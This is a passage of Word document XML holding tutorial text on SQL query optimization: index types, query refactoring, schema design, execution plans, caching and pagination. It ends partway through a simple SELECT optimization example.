      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a critical aspect of database management aimed at improving the performance of database queries. It involves refining queries and database structures to reduce response times, lower resource consumption, and increase efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA40BB" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Strategies for Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF21AC1" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Indexing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF92945"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Indexes improve the speed of data retrieval operations by creating a data structure that allows quick lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B0F6A8"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Types of Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF38CE2" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single-Column Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Index on a single column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D708BB3" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Composite Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Index on multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC2472" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unique Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensures unique values in the indexed column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FF221F" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full-Text Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Optimizes searches within text columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCCF115"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Best Practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4962CE" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index columns that are frequently used in WHERE clauses, JOIN conditions, and ORDER BY statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C60712C" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid over-indexing as it can impact write performance and increase storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE273E3" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Refactoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C848935"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Rewrite Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Optimize query syntax to make it more efficient. For example, use JOINs instead of subqueries where appropriate, and avoid unnecessary calculations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13908382"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Use Efficient Operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Choose operators and functions that optimize performance, such as avoiding LIKE '%value%' which can be slow for large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A11D01E" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Schema Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869EA17"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Normalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure that the database schema is properly normalized to reduce data redundancy and improve data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62462A01"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Denormalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: In some cases, denormalization (introducing redundancy) may improve query performance by reducing the need for complex joins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6444D"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Use Appropriate Data Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Select data types that match the nature of the data and avoid using overly large data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293712F1" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Execution Plans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE80A4"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Analyze Execution Plans</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use tools provided by the database system (such as EXPLAIN in MySQL and PostgreSQL) to analyze how a query is executed and identify bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9EC4B"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Optimize Execution Plans</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Based on the analysis, adjust indexes, query structure, and database schema to improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EAD57C" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CC087"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Result Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Store the results of frequently run queries in cache to reduce the need for repeated execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1842C3A7"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lastRenderedPageBreak/>
        <w:t>Database Caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use database-level caching mechanisms, such as query caches, to store intermediate results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54589184" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Database Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D36977"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Memory Allocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Configure database memory settings (e.g., buffer pool size) to optimize performance for the expected workload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81E561"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Concurrency Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Adjust settings related to concurrency, such as connection limits and transaction isolation levels, to improve performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B498A57" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Avoid Full Table Scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CE5BF"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Use Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Ensure queries use indexes rather than performing full table scans, which can be significantly slower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416CECA"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Optimize WHERE Clauses</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Write WHERE clauses that allow indexes to be used effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0805B5" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Limit Result Set Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CFC101"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Pagination</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use pagination techniques to limit the size of result sets and reduce memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C0B73"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Select Only Required Columns</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Avoid SELECT * and instead specify only the columns needed for the query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFE436" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Profiling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2D69D"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Monitor Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use monitoring tools to track query performance, identify slow queries, and understand query execution patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03102D90" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Profile Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Continuously profile and review query performance as the database grows and usage patterns change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0AFC7" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example of Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B541D30" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Original Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199217D9" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D"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SELECT * FROM orders WHERE customer_id = 12345;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A99B8E" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Issue</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: If customer_id is not indexed, this query may perform a full table scan, which is inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C15826" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimized Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195F812C" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
